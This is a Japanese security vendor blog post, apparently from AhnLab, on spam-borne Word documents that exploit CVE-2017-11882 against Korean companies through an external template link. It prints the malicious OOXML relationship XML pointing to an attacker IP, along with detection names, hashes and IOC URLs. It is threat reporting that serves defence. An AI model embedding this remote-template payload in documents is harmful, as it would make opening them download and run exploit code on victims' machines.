MS Office Word ドキュメントの External 外部リンクへの接続を利用した RTF 脆弱性(CVE-2017-11882)によるマルウェアの配布事例が確認された。韓国国内のショッピングモール等の企業をターゲットにスパムメールを利用してマルウェアが配布されており、注意が必要である。
最近、External 接続を利用した Office ドキュメントによる不正なファイルの拡散が著しく増加している。OOXML(Office Open XML)フォーマットの正常な XML Relationship を利用して、Target アドレスのみに不正な URL を利用するため、ファイルのバイナリだけでは不正かどうかを判断することが難しい。以下はドキュメントに挿入された不正な URL である。ドキュメントを開くと自動的に不正な URL へ接続を試みる。
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"
Target="http://23.95.122.25/..-.-................-.....-------------/........................................................................dot" TargetMode="External"/></Relationships>
接続後は RTF の脆弱性ファイルのバイナリを、現在開いている文書にロードする。脆弱性は CVE-2017-11882 であり、過去に公表されたものである。VirusTotal で照会すると、AhnLab V3 を含む、すでに多数のアンチウイルス製品で権利されている状態である。
MS Office Word ドキュメントファイルを不正なファイルと検知していなくても、実行段階で RTF バイナリがロードされた場合は、 V3 製品でリアルタイムで遮断を行い、被害を防ぐことができる。
AhnLab では、リアルタイムで実行段階において遮断するほか、関連するタイプのファイルを以下の通り検知している。
[ファイル検知]
Downloader/XML.External
Downloader/DOC.External
Downloader/XML.External.S1461
RTF/Malform-A.Gen
[IOC]
3fdc2e4e52b6499def0ff7411a7e0060
506e20689941bee2677c7214bc2083f2
e70135cdb555ce99adee7df642813dcb
hxxp://23.95.122.25/..-.-…………….-…..————-/…………………………………………………….dot
hxxp://23.95.122.25/..-.-…………….-…..————-/………………………………………………………………dot
Categories:マルウェアの情報
[…] https://asec.ahnlab.com/jp/22437/ […]